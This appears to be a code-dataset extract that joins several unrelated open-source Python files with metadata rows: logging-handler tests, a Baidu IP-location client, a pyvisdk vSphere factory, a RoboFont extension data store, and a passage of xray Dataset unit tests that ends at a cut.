ah(logging.handlers.SysLogHandler())
ah(logging.handlers.SMTPHandler(
'mail.example.com', 'Server', 'Sysadmin', 'Logs!'))
# ah(logging.handlers.NTEventLogHandler())
ah(logging.handlers.HTTPHandler('api.example.com', '/logs', 'POST'))
ah(logging.handlers.BufferingHandler(20000))
sh = logging.StreamHandler()
ah(logging.handlers.MemoryHandler(30000, target=sh))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler RotatingFile '/bar/one.txt' maxBytes=10000 backupCount=3
Handler Socket server.example.com 514
Handler Datagram server.example.com 1958
Handler SysLog ('localhost', 514) facility=1
Handler SMTP via mail.example.com to ['Sysadmin']
Handler HTTP POST to http://api.example.com//logs
Handler Buffering capacity=20000
Handler Memory capacity=30000 dumping to:
Handler Stream %r
''' % (sh.stream,))
logging.getLogger('').handlers[3].socket.close() # or Python 3 warning
def test_2_dot_5_handlers(self):
if sys.version_info < (2, 5):
return
ah = logging.getLogger('').addHandler
ah(logging.handlers.TimedRotatingFileHandler('/bar/two.txt'))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler TimedRotatingFile '/bar/two.txt' when='H' interval=3600 backupCount=0
''')
def test_2_dot_6_handlers(self):
if sys.version_info < (2, 6):
return
ah = logging.getLogger('').addHandler
ah(logging.handlers.WatchedFileHandler('/bar/three.txt'))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler WatchedFile '/bar/three.txt'
''')
def test_nested_handlers(self):
h1 = logging.StreamHandler()
h2 = logging.handlers.MemoryHandler(30000, target=h1)
h2.addFilter(logging.Filter('worse'))
h3 = logging.handlers.MemoryHandler(30000, target=h2)
h3.addFilter(logging.Filter('bad'))
logging.getLogger('').addHandler(h3)
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler Memory capacity=30000 dumping to:
Filter name='bad'
Handler Memory capacity=30000 dumping to:
Filter name='worse'
Handler Stream %r
''' % (h1.stream,))
class MyFilter(object):
def __repr__(self):
return '<MyFilter>'
class MyHandler(object):
def __repr__(self):
return '<MyHandler>'
if __name__ == '__main__': # for Python <= 2.4
unittest.main()
| bsd-2-clause | -7,244,357,543,753,971,000 | 27.989848 | 80 | 0.614778 | false |
hunter007/baidupy | baidu/api/iplocation.py | 1 | 1068 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from baidu.api.base import BaseAPI
class IPLocationAPI(BaseAPI):
scope = 'location'
version = ''
def get_location_info(self, ip='', coor=''):
"""
        Get the location information for an IP address.
        1. Location of a specific IP: pass an IP value and the location
           information for that IP is returned.
        2. Location of the current device's IP: when no IP is given, the
           location is resolved from the requesting device's current IP.
        :param ip: when omitted, or present but an empty string, the current
            visitor's IP address is used as the lookup parameter
        :param coor: when omitted, Baidu Mercator coordinates are returned by
            default; when coor="bd09ll", Baidu latitude/longitude coordinates are returned
        ..tips: coor="bd09ll" corresponds to the coor_type=3 described in other APIs.
"""
params = {}
if ip:
params['ip'] = ip
if coor:
if str(coor).lower() == 'bd09ll':
params['coor'] = 'bd09ll'
return self.get('/ip', params=params)
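# Illustrative usage sketch (editor's addition): construction of the client
# depends on BaseAPI, so the snippet below is indicative only.
# api = IPLocationAPI(client)                    # `client` is a configured BaseAPI backend
# info = api.get_location_info(ip='8.8.8.8', coor='bd09ll')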
| mit | -3,485,742,135,887,327,700 | 26.310345 | 53 | 0.541667 | false |
xuru/pyvisdk | pyvisdk/do/compute_resource_config_info.py | 1 | 1074 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def ComputeResourceConfigInfo(vim, *args, **kwargs):
'''Configuration of the compute resource; applies to both standalone hosts and
clusters.'''
obj = vim.client.factory.create('ns0:ComputeResourceConfigInfo')
# do some validation checking...
if (len(args) + len(kwargs)) < 1:
        raise IndexError('Expected at least 1 argument, got: %d' % len(args))
required = [ 'vmSwapPlacement' ]
optional = [ 'spbmEnabled', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
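# Illustrative usage sketch (editor's addition): `vim` is assumed to be an
# already-connected pyvisdk service instance, and 'vmDirectory' is one example
# swap placement value.
# config_info = ComputeResourceConfigInfo(vim, vmSwapPlacement='vmDirectory')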
| mit | -5,653,184,942,584,587,000 | 30.617647 | 124 | 0.608939 | false |
typemytype/RoboFontExtensions | ramsaySt/RamsaySt.roboFontExt/lib/ramsayStData.py | 1 | 3963 | from AppKit import NSColor, NSObject
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
_baseDefaultKey = "com.typemytype.ramsaySt"
_fillColorDefaultKey = "%s.fillColor" % _baseDefaultKey
_strokeColorDefaultKey = "%s.strokeColor" %_baseDefaultKey
_showPreviewDefaultKey = "%s.showPreview" %_baseDefaultKey
_dataDefaultKey = "%s.data" % _baseDefaultKey
class RamsayStDataItem(NSObject):
def __new__(cls, *args, **kwargs):
return cls.alloc().init()
def __init__(self, glyphName, value):
self._glyphName = glyphName
self._value = list(value)
def getRamsaySt(self):
return self._value
def glyphName(self):
return self._glyphName
def setGlyphName_(self, value):
if value is None:
return
self._glyphName = value
def left(self):
return self._value[0]
def setLeft_(self, value):
if value is None:
value = " "
self._value[0] = value
def right(self):
return self._value[1]
def setRight_(self, value):
if value is None:
value = " "
self._value[1] = value
class RamsayStDataCollection(object):
_fallBackFillColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(.34, .54, .92, .7)
_fallBackStrokeColor = NSColor.blackColor()
_fallbackData = {'-': ('n', 'H'), 'A': ('H', 'V'), 'C': ('c', 'G'), 'B': ('P', 'D'), 'E': ('B', 'F'), 'D': ('B', 'P'), 'G': ('C', 'O'), 'F': ('P', 'E'), 'I': ('J', 'H'), 'H': ('I', 'P'), 'K': ('k', 'I'), 'J': ('j', 'I'), 'M': ('H', 'N'), 'L': ('I', 'H'), 'O': ('C', 'o'), 'N': ('M', 'V'), 'Q': ('O', 'G'), 'P': ('R', 'p'), 'S': ('C', 's'), 'R': ('B', 'P'), 'U': ('u', 'H'), 'T': ('I', 'H'), 'W': ('w', 'V'), 'V': ('v', 'W'), 'Y': ('y', 'V'), 'X': ('x', 'Y'), 'Z': ('z', 'X'), 'a': ('n', 'e'), 'c': ('e', 'C'), 'b': ('d', 'p'), 'e': ('o', 'c'), 'd': ('q', 'b'), 'g': ('o', 'q'), 'f': ('i', 't'), 'i': ('period', 'j'), 'h': ('l', 'n'), 'k': ('h', 'K'), 'j': ('i', 'period'), 'm': ('n', 'w'), 'l': ('h', 'k'), 'o': ('c', 'O'), 'n': ('h', 'm'), 'q': ('d', 'p'), 'p': ('q', 'P'), 's': ('e', 'S'), 'r': ('s', 'n'), 'u': ('v', 'n'), 't': ('s', 'f'), 'w': ('v', 'W'), 'v': ('u', 'w'), 'y': ('v', 'Y'), 'x': ('y', 'X'), 'z': ('x', 'Z')}
_fallbackShowPreview = True
def __init__(self):
self.load()
def load(self):
self.fillColor = getExtensionDefaultColor(_fillColorDefaultKey, self._fallBackFillColor)
self.strokeColor = getExtensionDefaultColor(_strokeColorDefaultKey, self._fallBackStrokeColor)
self.showPreview = getExtensionDefault(_showPreviewDefaultKey, self._fallbackShowPreview)
self.data = getExtensionDefault(_dataDefaultKey, self._fallbackData)
def save(self):
setExtensionDefaultColor(_fillColorDefaultKey, self.fillColor)
setExtensionDefaultColor(_strokeColorDefaultKey, self.strokeColor)
setExtensionDefault(_showPreviewDefaultKey, self.showPreview)
setExtensionDefault(_dataDefaultKey, self.data)
def keys(self):
return self.data.keys()
def __contains__(self, key):
return key in self.data
def get(self, value, fallback=("n", "n")):
return self.data.get(value, fallback)
def set(self, item):
key = item.glyphName()
if key is None:
return
self.data[key] = item.getRamsaySt()
def setItems(self, data):
self.data = dict()
for item in data:
self.data[item.glyphName()] = item.getRamsaySt()
self.save()
def getItems(self):
keys = list(self.data.keys())
keys.sort()
return [RamsayStDataItem(key, self.data[key]) for key in keys]
def newItem(self, glyphName):
return RamsayStDataItem(glyphName, (" ", " "))
RamsayStData = RamsayStDataCollection() | mit | 6,503,598,902,005,581,000 | 39.865979 | 931 | 0.533434 | false |
cpaulik/xray | xray/test/test_dataset.py | 1 | 86929 | from copy import copy, deepcopy
from textwrap import dedent
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import dask.array as da
except ImportError:
pass
import numpy as np
import pandas as pd
from xray import (align, concat, conventions, backends, Dataset, DataArray,
Variable, Coordinate, auto_combine, open_dataset,
set_options)
from xray.core import indexing, utils
from xray.core.pycompat import iteritems, OrderedDict
from . import (TestCase, unittest, InaccessibleArray, UnexpectedDataAccess,
requires_dask)
def create_test_data(seed=None):
rs = np.random.RandomState(seed)
_vars = {'var1': ['dim1', 'dim2'],
'var2': ['dim1', 'dim2'],
'var3': ['dim3', 'dim1']}
_dims = {'dim1': 8, 'dim2': 9, 'dim3': 10}
obj = Dataset()
obj['time'] = ('time', pd.date_range('2000-01-01', periods=20))
obj['dim1'] = ('dim1', np.arange(_dims['dim1'], dtype='int64'))
obj['dim2'] = ('dim2', 0.5 * np.arange(_dims['dim2']))
obj['dim3'] = ('dim3', list('abcdefghij'))
for v, dims in sorted(_vars.items()):
data = rs.normal(size=tuple(_dims[d] for d in dims))
obj[v] = (dims, data, {'foo': 'variable'})
obj.coords['numbers'] = ('dim3', np.array([0, 1, 2, 0, 0, 1, 1, 2, 2, 3],
dtype='int64'))
return obj
class InaccessibleVariableDataStore(backends.InMemoryDataStore):
def get_variables(self):
def lazy_inaccessible(x):
data = indexing.LazilyIndexedArray(InaccessibleArray(x.values))
return Variable(x.dims, data, x.attrs)
return dict((k, lazy_inaccessible(v)) for
k, v in iteritems(self._variables))
class TestDataset(TestCase):
def test_repr(self):
data = create_test_data(seed=123)
data.attrs['foo'] = 'bar'
# need to insert str dtype at runtime to handle both Python 2 & 3
expected = dedent("""\
<xray.Dataset>
Dimensions: (dim1: 8, dim2: 9, dim3: 10, time: 20)
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03 ...
* dim1 (dim1) int64 0 1 2 3 4 5 6 7
* dim2 (dim2) float64 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0
* dim3 (dim3) %s 'a' 'b' 'c' 'd' 'e' 'f' 'g' 'h' 'i' 'j'
numbers (dim3) int64 0 1 2 0 0 1 1 2 2 3
Data variables:
var1 (dim1, dim2) float64 -1.086 0.9973 0.283 -1.506 -0.5786 1.651 ...
var2 (dim1, dim2) float64 1.162 -1.097 -2.123 1.04 -0.4034 -0.126 ...
var3 (dim3, dim1) float64 0.5565 -0.2121 0.4563 1.545 -0.2397 0.1433 ...
Attributes:
foo: bar""") % data['dim3'].dtype
actual = '\n'.join(x.rstrip() for x in repr(data).split('\n'))
print(actual)
self.assertEqual(expected, actual)
with set_options(display_width=100):
max_len = max(map(len, repr(data).split('\n')))
assert 90 < max_len < 100
expected = dedent("""\
<xray.Dataset>
Dimensions: ()
Coordinates:
*empty*
Data variables:
*empty*""")
actual = '\n'.join(x.rstrip() for x in repr(Dataset()).split('\n'))
print(actual)
self.assertEqual(expected, actual)
# verify that ... doesn't appear for scalar coordinates
data = Dataset({'foo': ('x', np.ones(10))}).mean()
expected = dedent("""\
<xray.Dataset>
Dimensions: ()
Coordinates:
*empty*
Data variables:
foo float64 1.0""")
actual = '\n'.join(x.rstrip() for x in repr(data).split('\n'))
print(actual)
self.assertEqual(expected, actual)
# verify long attributes are truncated
data = Dataset(attrs={'foo': 'bar' * 1000})
self.assertTrue(len(repr(data)) < 1000)
def test_constructor(self):
x1 = ('x', 2 * np.arange(100))
x2 = ('x', np.arange(1000))
z = (['x', 'y'], np.arange(1000).reshape(100, 10))
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
Dataset({'a': x1, 'b': x2})
with self.assertRaisesRegexp(ValueError, 'must be defined with 1-d'):
Dataset({'a': x1, 'x': z})
with self.assertRaisesRegexp(TypeError, 'must be an array or'):
Dataset({'x': (1, 2, 3, 4, 5, 6, 7)})
with self.assertRaisesRegexp(ValueError, 'already exists as a scalar'):
Dataset({'x': 0, 'y': ('x', [1, 2, 3])})
# verify handling of DataArrays
expected = Dataset({'x': x1, 'z': z})
actual = Dataset({'z': expected['z']})
self.assertDatasetIdentical(expected, actual)
def test_constructor_1d(self):
expected = Dataset({'x': (['x'], 5.0 + np.arange(5))})
actual = Dataset({'x': 5.0 + np.arange(5)})
self.assertDatasetIdentical(expected, actual)
actual = Dataset({'x': [5, 6, 7, 8, 9]})
self.assertDatasetIdentical(expected, actual)
def test_constructor_0d(self):
expected = Dataset({'x': ([], 1)})
for arg in [1, np.array(1), expected['x']]:
actual = Dataset({'x': arg})
self.assertDatasetIdentical(expected, actual)
d = pd.Timestamp('2000-01-01T12')
args = [True, None, 3.4, np.nan, 'hello', u'uni', b'raw',
np.datetime64('2000-01-01T00'), d, d.to_datetime()]
for arg in args:
print(arg)
expected = Dataset({'x': ([], arg)})
actual = Dataset({'x': arg})
self.assertDatasetIdentical(expected, actual)
def test_constructor_auto_align(self):
a = DataArray([1, 2], [('x', [0, 1])])
b = DataArray([3, 4], [('x', [1, 2])])
# verify align uses outer join
expected = Dataset({'a': ('x', [1, 2, np.nan]),
'b': ('x', [np.nan, 3, 4])})
actual = Dataset({'a': a, 'b': b})
self.assertDatasetIdentical(expected, actual)
# regression test for GH346
self.assertIsInstance(actual.variables['x'], Coordinate)
# variable with different dimensions
c = ('y', [3, 4])
expected2 = expected.merge({'c': c})
actual = Dataset({'a': a, 'b': b, 'c': c})
self.assertDatasetIdentical(expected2, actual)
# variable that is only aligned against the aligned variables
d = ('x', [3, 2, 1])
expected3 = expected.merge({'d': d})
actual = Dataset({'a': a, 'b': b, 'd': d})
self.assertDatasetIdentical(expected3, actual)
e = ('x', [0, 0])
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
Dataset({'a': a, 'b': b, 'e': e})
def test_constructor_compat(self):
data = OrderedDict([('x', DataArray(0, coords={'y': 1})),
('y', ('z', [1, 1, 1]))])
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
Dataset(data, compat='equals')
expected = Dataset({'x': 0}, {'y': ('z', [1, 1, 1])})
actual = Dataset(data)
self.assertDatasetIdentical(expected, actual)
actual = Dataset(data, compat='broadcast_equals')
self.assertDatasetIdentical(expected, actual)
data = OrderedDict([('y', ('z', [1, 1, 1])),
('x', DataArray(0, coords={'y': 1}))])
actual = Dataset(data)
self.assertDatasetIdentical(expected, actual)
original = Dataset({'a': (('x', 'y'), np.ones((2, 3)))},
{'c': (('x', 'y'), np.zeros((2, 3)))})
expected = Dataset({'a': ('x', np.ones(2)),
'b': ('y', np.ones(3))},
{'c': (('x', 'y'), np.zeros((2, 3)))})
# use an OrderedDict to ensure test results are reproducible; otherwise
# the order of appearance of x and y matters for the order of
# dimensions in 'c'
actual = Dataset(OrderedDict([('a', original['a'][:, 0].drop('y')),
('b', original['a'][0].drop('x'))]))
self.assertDatasetIdentical(expected, actual)
data = {'x': DataArray(0, coords={'y': 3}), 'y': ('z', [1, 1, 1])}
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
Dataset(data)
data = {'x': DataArray(0, coords={'y': 1}), 'y': [1, 1]}
actual = Dataset(data)
expected = Dataset({'x': 0}, {'y': [1, 1]})
self.assertDatasetIdentical(expected, actual)
def test_constructor_with_coords(self):
with self.assertRaisesRegexp(ValueError, 'redundant variables and co'):
Dataset({'a': ('x', [1])}, {'a': ('x', [1])})
ds = Dataset({}, {'a': ('x', [1])})
self.assertFalse(ds.data_vars)
self.assertItemsEqual(ds.coords.keys(), ['x', 'a'])
def test_properties(self):
ds = create_test_data()
self.assertEqual(ds.dims,
{'dim1': 8, 'dim2': 9, 'dim3': 10, 'time': 20})
self.assertItemsEqual(ds, list(ds.variables))
self.assertItemsEqual(ds.keys(), list(ds.variables))
self.assertNotIn('aasldfjalskdfj', ds.variables)
self.assertIn('dim1', repr(ds.variables))
self.assertEqual(len(ds), 8)
self.assertItemsEqual(ds.data_vars, ['var1', 'var2', 'var3'])
self.assertItemsEqual(ds.data_vars.keys(), ['var1', 'var2', 'var3'])
self.assertIn('var1', ds.data_vars)
self.assertNotIn('dim1', ds.data_vars)
self.assertNotIn('numbers', ds.data_vars)
self.assertEqual(len(ds.data_vars), 3)
self.assertItemsEqual(ds.indexes, ['dim1', 'dim2', 'dim3', 'time'])
self.assertEqual(len(ds.indexes), 4)
self.assertIn('dim1', repr(ds.indexes))
self.assertItemsEqual(ds.coords,
['time', 'dim1', 'dim2', 'dim3', 'numbers'])
self.assertIn('dim1', ds.coords)
self.assertIn('numbers', ds.coords)
self.assertNotIn('var1', ds.coords)
self.assertEqual(len(ds.coords), 5)
self.assertEqual(Dataset({'x': np.int64(1),
'y': np.float32([1, 2])}).nbytes, 16)
def test_attr_access(self):
ds = Dataset({'tmin': ('x', [42], {'units': 'Celcius'})},
attrs={'title': 'My test data'})
self.assertDataArrayIdentical(ds.tmin, ds['tmin'])
self.assertDataArrayIdentical(ds.tmin.x, ds.x)
self.assertEqual(ds.title, ds.attrs['title'])
self.assertEqual(ds.tmin.units, ds['tmin'].attrs['units'])
self.assertLessEqual(set(['tmin', 'title']), set(dir(ds)))
self.assertIn('units', set(dir(ds.tmin)))
# should defer to variable of same name
ds.attrs['tmin'] = -999
self.assertEqual(ds.attrs['tmin'], -999)
self.assertDataArrayIdentical(ds.tmin, ds['tmin'])
def test_variable(self):
a = Dataset()
d = np.random.random((10, 3))
a['foo'] = (('time', 'x',), d)
self.assertTrue('foo' in a.variables)
self.assertTrue('foo' in a)
a['bar'] = (('time', 'x',), d)
# order of creation is preserved
self.assertEqual(list(a), ['foo', 'time', 'x', 'bar'])
self.assertTrue(all([a['foo'][i].values == d[i]
for i in np.ndindex(*d.shape)]))
# try to add variable with dim (10,3) with data that's (3,10)
with self.assertRaises(ValueError):
a['qux'] = (('time', 'x'), d.T)
def test_modify_inplace(self):
a = Dataset()
vec = np.random.random((10,))
attributes = {'foo': 'bar'}
a['x'] = ('x', vec, attributes)
self.assertTrue('x' in a.coords)
self.assertIsInstance(a.coords['x'].to_index(),
pd.Index)
self.assertVariableIdentical(a.coords['x'], a.variables['x'])
b = Dataset()
b['x'] = ('x', vec, attributes)
self.assertVariableIdentical(a['x'], b['x'])
self.assertEqual(a.dims, b.dims)
# this should work
a['x'] = ('x', vec[:5])
a['z'] = ('x', np.arange(5))
with self.assertRaises(ValueError):
# now it shouldn't, since there is a conflicting length
a['x'] = ('x', vec[:4])
arr = np.random.random((10, 1,))
scal = np.array(0)
with self.assertRaises(ValueError):
a['y'] = ('y', arr)
with self.assertRaises(ValueError):
a['y'] = ('y', scal)
self.assertTrue('y' not in a.dims)
def test_coords_properties(self):
# use an OrderedDict for coordinates to ensure order across python
# versions
# use int64 for repr consistency on windows
data = Dataset(OrderedDict([('x', ('x', np.array([-1, -2], 'int64'))),
('y', ('y', np.array([0, 1, 2], 'int64'))),
('foo', (['x', 'y'],
np.random.randn(2, 3)))]),
OrderedDict([('a', ('x', np.array([4, 5], 'int64'))),
('b', np.int64(-10))]))
self.assertEqual(4, len(data.coords))
self.assertItemsEqual(['x', 'y', 'a', 'b'], list(data.coords))
self.assertVariableIdentical(data.coords['x'], data['x'].variable)
self.assertVariableIdentical(data.coords['y'], data['y'].variable)
self.assertIn('x', data.coords)
self.assertIn('a', data.coords)
self.assertNotIn(0, data.coords)
self.assertNotIn('foo', data.coords)
with self.assertRaises(KeyError):
data.coords['foo']
with self.assertRaises(KeyError):
data.coords[0]
expected = dedent("""\
Coordinates:
* x (x) int64 -1 -2
* y (y) int64 0 1 2
a (x) int64 4 5
b int64 -10""")
actual = repr(data.coords)
self.assertEqual(expected, actual)
self.assertEqual({'x': 2, 'y': 3}, data.coords.dims)
def test_coords_modify(self):
data = Dataset({'x': ('x', [-1, -2]),
'y': ('y', [0, 1, 2]),
'foo': (['x', 'y'], np.random.randn(2, 3))},
{'a': ('x', [4, 5]), 'b': -10})
actual = data.copy(deep=True)
actual.coords['x'] = ('x', ['a', 'b'])
self.assertArrayEqual(actual['x'], ['a', 'b'])
actual = data.copy(deep=True)
actual.coords['z'] = ('z', ['a', 'b'])
self.assertArrayEqual(actual['z'], ['a', 'b'])
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
data.coords['x'] = ('x', [-1])
actual = data.copy()
del actual.coords['b']
expected = data.reset_coords('b', drop=True)
self.assertDatasetIdentical(expected, actual)
with self.assertRaises(KeyError):
del data.coords['not_found']
with self.assertRaises(KeyError):
del data.coords['foo']
actual = data.copy(deep=True)
actual.coords.update({'c': 11})
expected = data.merge({'c': 11}).set_coords('c')
self.assertDatasetIdentical(expected, actual)
def test_coords_set(self):
one_coord = Dataset({'x': ('x', [0]),
'yy': ('x', [1]),
'zzz': ('x', [2])})
two_coords = Dataset({'zzz': ('x', [2])},
{'x': ('x', [0]),
'yy': ('x', [1])})
all_coords = Dataset(coords={'x': ('x', [0]),
'yy': ('x', [1]),
'zzz': ('x', [2])})
actual = one_coord.set_coords('x')
self.assertDatasetIdentical(one_coord, actual)
actual = one_coord.set_coords(['x'])
self.assertDatasetIdentical(one_coord, actual)
actual = one_coord.set_coords('yy')
self.assertDatasetIdentical(two_coords, actual)
actual = one_coord.set_coords(['yy', 'zzz'])
self.assertDatasetIdentical(all_coords, actual)
actual = one_coord.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = two_coords.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords(['yy', 'zzz'])
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords('zzz')
self.assertDatasetIdentical(two_coords, actual)
with self.assertRaisesRegexp(ValueError, 'cannot remove index'):
one_coord.reset_coords('x')
actual = all_coords.reset_coords('zzz', drop=True)
expected = all_coords.drop('zzz')
self.assertDatasetIdentical(expected, actual)
expected = two_coords.drop('zzz')
self.assertDatasetIdentical(expected, actual)
def test_coords_to_dataset(self):
orig = Dataset({'foo': ('y', [-1, 0, 1])}, {'x': 10, 'y': [2, 3, 4]})
expected = Dataset(coords={'x': 10, 'y': [2, 3, 4]})
actual = orig.coords.to_dataset()
self.assertDatasetIdentical(expected, actual)
def test_coords_merge(self):
orig_coords = Dataset(coords={'a': ('x', [1, 2])}).coords
other_coords = Dataset(coords={'b': ('x', ['a', 'b'])}).coords
expected = Dataset(coords={'a': ('x', [1, 2]),
'b': ('x', ['a', 'b'])})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'x': ('x', ['a'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'x': ('x', ['a', 'b'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'x': ('x', ['a', 'b', 'c'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'a': ('x', [8, 9])}).coords
expected = Dataset(coords={'x': range(2)})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'x': np.nan}).coords
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(orig_coords.to_dataset(), actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(orig_coords.to_dataset(), actual)
def test_coords_merge_mismatched_shape(self):
orig_coords = Dataset(coords={'a': ('x', [1, 1])}).coords
other_coords = Dataset(coords={'a': 1}).coords
expected = orig_coords.to_dataset()
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'a': ('y', [1])}).coords
expected = Dataset(coords={'a': (['x', 'y'], [[1], [1]])})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected.T, actual)
orig_coords = Dataset(coords={'a': ('x', [np.nan])}).coords
other_coords = Dataset(coords={'a': np.nan}).coords
expected = orig_coords.to_dataset()
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
def test_equals_and_identical(self):
data = create_test_data(seed=42)
self.assertTrue(data.equals(data))
self.assertTrue(data.identical(data))
data2 = create_test_data(seed=42)
data2.attrs['foobar'] = 'baz'
self.assertTrue(data.equals(data2))
self.assertFalse(data.identical(data2))
del data2['time']
self.assertFalse(data.equals(data2))
data = create_test_data(seed=42).rename({'var1': None})
self.assertTrue(data.equals(data))
self.assertTrue(data.identical(data))
data2 = data.reset_coords()
self.assertFalse(data2.equals(data))
self.assertFalse(data2.identical(data))
def test_equals_failures(self):
data = create_test_data()
self.assertFalse(data.equals('foo'))
self.assertFalse(data.identical(123))
self.assertFalse(data.broadcast_equals({1: 2}))
def test_broadcast_equals(self):
data1 = Dataset(coords={'x': 0})
data2 = Dataset(coords={'x': [0]})
self.assertTrue(data1.broadcast_equals(data2))
self.assertFalse(data1.equals(data2))
self.assertFalse(data1.identical(data2))
def test_attrs(self):
data = create_test_data(seed=42)
data.attrs = {'foobar': 'baz'}
self.assertTrue(data.attrs['foobar'], 'baz')
self.assertIsInstance(data.attrs, OrderedDict)
@requires_dask
def test_chunk(self):
data = create_test_data()
for v in data.variables.values():
self.assertIsInstance(v.data, np.ndarray)
self.assertEqual(data.chunks, {})
reblocked = data.chunk()
for v in reblocked.variables.values():
self.assertIsInstance(v.data, da.Array)
expected_chunks = dict((d, (s,)) for d, s in data.dims.items())
self.assertEqual(reblocked.chunks, expected_chunks)
reblocked = data.chunk({'time': 5, 'dim1': 5, 'dim2': 5, 'dim3': 5})
expected_chunks = {'time': (5,) * 4, 'dim1': (5, 3),
'dim2': (5, 4), 'dim3': (5, 5)}
self.assertEqual(reblocked.chunks, expected_chunks)
reblocked = data.chunk(expected_chunks)
self.assertEqual(reblocked.chunks, expected_chunks)
# reblock on already blocked data
reblocked = reblocked.chunk(expected_chunks)
self.assertEqual(reblocked.chunks, expected_chunks)
self.assertDatasetIdentical(reblocked, data)
with self.assertRaisesRegexp(ValueError, 'some chunks'):
data.chunk({'foo': 10})
@requires_dask
def test_dask_is_lazy(self):
store = InaccessibleVariableDataStore()
create_test_data().dump_to_store(store)
ds = open_dataset(store).chunk()
with self.assertRaises(UnexpectedDataAccess):
ds.load()
with self.assertRaises(UnexpectedDataAccess):
ds['var1'].values
# these should not raise UnexpectedDataAccess:
ds.var1.data
ds.isel(time=10)
ds.isel(time=slice(10), dim1=[0]).isel(dim1=0, dim2=-1)
ds.transpose()
ds.mean()
ds.fillna(0)
ds.rename({'dim1': 'foobar'})
ds.set_coords('var1')
ds.drop('var1')
def test_isel(self):
data = create_test_data()
slicers = {'dim1': slice(None, None, 2), 'dim2': slice(0, 2)}
ret = data.isel(**slicers)
# Verify that only the specified dimension was altered
self.assertItemsEqual(data.dims, ret.dims)
for d in data.dims:
if d in slicers:
self.assertEqual(ret.dims[d],
np.arange(data.dims[d])[slicers[d]].size)
else:
self.assertEqual(data.dims[d], ret.dims[d])
# Verify that the data is what we expect
for v in data:
self.assertEqual(data[v].dims, ret[v].dims)
self.assertEqual(data[v].attrs, ret[v].attrs)
slice_list = [slice(None)] * data[v].values.ndim
for d, s in iteritems(slicers):
if d in data[v].dims:
inds = np.nonzero(np.array(data[v].dims) == d)[0]
for ind in inds:
slice_list[ind] = s
expected = data[v].values[slice_list]
actual = ret[v].values
np.testing.assert_array_equal(expected, actual)
with self.assertRaises(ValueError):
data.isel(not_a_dim=slice(0, 2))
ret = data.isel(dim1=0)
self.assertEqual({'time': 20, 'dim2': 9, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes, list(ret.indexes) + ['dim1'])
ret = data.isel(time=slice(2), dim1=0, dim2=slice(5))
self.assertEqual({'time': 2, 'dim2': 5, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes, list(ret.indexes) + ['dim1'])
ret = data.isel(time=0, dim1=0, dim2=slice(5))
self.assertItemsEqual({'dim2': 5, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes,
list(ret.indexes) + ['dim1', 'time'])
def test_sel(self):
data = create_test_data()
int_slicers = {'dim1': slice(None, None, 2),
'dim2': slice(2),
'dim3': slice(3)}
loc_slicers = {'dim1': slice(None, None, 2),
'dim2': slice(0, 0.5),
'dim3': slice('a', 'c')}
self.assertDatasetEqual(data.isel(**int_slicers),
data.sel(**loc_slicers))
data['time'] = ('time', pd.date_range('2000-01-01', periods=20))
self.assertDatasetEqual(data.isel(time=0),
data.sel(time='2000-01-01'))
self.assertDatasetEqual(data.isel(time=slice(10)),
data.sel(time=slice('2000-01-01',
'2000-01-10')))
self.assertDatasetEqual(data, data.sel(time=slice('1999', '2005')))
times = pd.date_range('2000-01-01', periods=3)
self.assertDatasetEqual(data.isel(time=slice(3)),
data.sel(time=times))
self.assertDatasetEqual(data.isel(time=slice(3)),
